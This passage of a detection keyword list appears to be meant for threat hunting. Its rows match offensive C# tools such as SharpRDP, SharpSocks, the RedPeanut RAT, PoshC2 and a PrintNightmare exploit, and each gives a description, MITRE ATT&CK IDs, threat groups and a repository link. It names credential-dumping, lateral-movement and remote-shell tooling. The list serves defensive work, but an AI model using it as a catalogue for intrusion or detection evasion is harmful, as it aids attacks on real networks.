+"*SharpLdapRelayScan*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SharpMapExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDump*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpMiniDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpMiniDumpManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpMove.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNamedPipePTH.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.csproj*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpNoPSExec.exe*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec.sln*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpNoPSExec-master*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"*SharpPack*","offensive_tool_keyword","SharpPack","SharpPack is a toolkit for insider threat assessments that lets you defeat application whitelisting to execute arbitrary DotNet and PowerShell tools.","T1218.010 - T1218.011 - T1059 - T1127 - T1055","TA0002 - TA0008 - TA0006","N/A","N/A","POST Exploitation 
tools","https://github.com/mdsecactivebreach/SharpPack","1","0","N/A","N/A","2","145","34","2018-12-17T11:55:12Z","2018-12-17T10:51:19Z" +"*SharpPrinter.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpPrintNightmare*","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tools","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","1736","587","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z" +"*sharpps $psversiontable*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpps get-process*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharppsexec*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpPsExecManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpPsExecService.*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpRDP.*.dll.bin*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.csproj*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRDP.exe*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDP.sln*","offensive_tool_keyword","SharpRDP","Remote Desktop 
Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*SharpRDPHijack.cs*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDPHijack.exe*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDPHijack-master*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","1","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z" +"*SharpRDP-master*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" +"*Sharpreflect *","offensive_tool_keyword","bruteratel","A Customized 
Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*SharpReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpRoast.exe*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*sharpsc *cmd*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - 
T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpSCCM*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"*SharpSCCM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSCShell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*SharpSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSecDump.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpsecretsdump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*SharpShares.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpShellPipe.exe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe.sln*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShellPipe-main*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*SharpShooter*","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1564 - T1204 - T1059 - T1105","TA0002 - TA0011 - 
TA0008","N/A","N/A","Frameworks","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","1683","352","2022-03-16T15:36:54Z","2018-03-06T20:04:20Z" +"*SharpShot.exe /*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*Sharp-SMBExec.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSniper.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpSocks.exe*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.pfx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.resx*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocks.sln*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksCommon*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via 
PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksConfig*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksImplant*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSocksServer*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*SharpSpawner.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*SharpSphere.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
